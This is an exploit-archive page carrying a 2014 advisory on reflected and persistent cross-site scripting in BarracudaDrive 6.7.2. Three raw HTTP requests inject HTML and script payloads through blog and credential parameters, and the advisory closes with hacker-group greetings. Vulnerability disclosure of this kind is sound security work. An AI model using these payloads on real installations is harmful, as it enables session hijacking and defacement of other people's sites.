exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

BarracudaDrive 6.7.2 Cross Site Scripting

BarracudaDrive 6.7.2 Cross Site Scripting
Posted May 16, 2014
Authored by Manish Tanwar

BarracudaDrive version 6.7.2 suffers from multiple reflective and persistent cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | d41472b73eb1e68306169abb69831256e5000c2d91afe4d895f79081b2bd8cb6

BarracudaDrive 6.7.2 Cross Site Scripting

Change Mirror Download
############################################################################### 
# Exploit Title : BarracudaDrive Content Management System Multiple XSS Vulnerabilities
# Author : Manish Kishan Tanwar
# Vendor : http://barracudadrive.com
# Software : BarracudaDrive 6.7.2
# Date : 15/05/2014
#Discovered At : IndiShell LAB (indishell.in aka indian cyber army)
#Love to : zero cool,Team indishell,Hardeep Singh
##############################################################################

////////////////////////////////////
// Overview of vulnerability ///
////////////////////////////////////
BarracudaDrive Multiple Reflected and Persistent Cross-site Scripting Vulnerabilities.

Reflected and Persistent Cross-Site Scripting vulnerabilities in BarracudaDrive, because it does not checking user user inputs before final processing.

1) Input passed via the "blog" parameter to "private/manage/" is not properly verified before it is givem to server for processing. This can be exploited to execute arbitrary HTML and script code.

2) Input passed via the "bloggeruser" parameter to "private/manage/" is not properly verified before it is givem to server for processing. This can be exploited to execute arbitrary HTML and script code.

3) Input passed via the "bloggerpasswd" parameter to "private/manage/" is not properly verified before it is givem to server for processing. This can be exploited to execute arbitrary HTML and script code.

///////////////////////////////
// Proof of Concept: -
///////////////////////////////

1).
http://localhost/private/manage/

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/private/manage/
Cookie: z9ZAqJtI=3176979a5371fd10
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 143

IsPublic=true&ShowLogin=on&GoogleAnalytics=&theme=BarracudaDriveb&blog=Blog"><h1>hi</h1>&msgrsskey=&bloggeruser=my_username&bloggerpasswd=my_password&fbkey=&fblink=Add+a+comment


2).
http://localhost/private/manage/

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/private/manage/
Cookie: z9ZAqJtI=3176979a5371fd10
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 143

IsPublic=true&ShowLogin=on&GoogleAnalytics=&theme=BarracudaDriveb&blog=Blog&msgrsskey=&bloggeruser=p"><marquee>hi</marquee>&bloggerpasswd=my_password&fbkey=&fblink=Add+a+comment

3).
http://localhost/private/manage/

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/private/manage/
Cookie: z9ZAqJtI=3176979a5371fd10
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 143

IsPublic=true&ShowLogin=on&GoogleAnalytics=&theme=BarracudaDriveb&blog=Blog&msgrsskey=&bloggeruser=my_username&bloggerpasswd=p"><script>alert(123);</script>&fbkey=&fblink=Add+a+comment



--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,Atul Dwivedi ethicalnoob Indishell,Local root indishell,
#Irfninja indishell,Reborn India,L0rd Crus4d3r,cool toad,cool shavik,Hackuin,Alicks,Ebin V Thomas
#Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoozoo,
#The creator,cyber warrior,Neo hacker ICA,Suriya Prakash, cyber gladiator,Cyber Ace,
#Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji ,
#Hacking queen,lovetherisk,brown suger and rest of TEAM INDISHELL
#############################################################################################
--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Anju Gulia,Don(Deepika kaushik) and acche bacchi(Jagriti)
--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close